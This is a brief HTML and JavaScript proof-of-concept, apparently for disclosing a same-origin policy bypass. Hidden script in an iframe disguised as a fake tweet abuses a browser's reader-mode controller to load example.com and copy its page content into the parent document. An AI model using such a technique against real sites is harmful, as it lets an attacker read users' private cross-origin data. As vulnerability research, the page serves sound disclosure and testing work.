This iframe has a fake tweet with JS in it.......<pre id=z><iframe srcdoc="...<script> var f = document.createElement('iframe'); f.id = 'foo'; f.onload = function() { parent.ReaderJSController.prepareNextPageFrame('foo'); var t = parent.ReaderJSController.nextPageArticleFinder(); parent.document.querySelector('pre').textContent = t ? t.contentDocument.body.outerHTML : 'No content?'; }; f.src = 'https://example.com/'; parent.document.body.appendChild(f); </script>">If you see content from example.com here, there's a SOP bypass: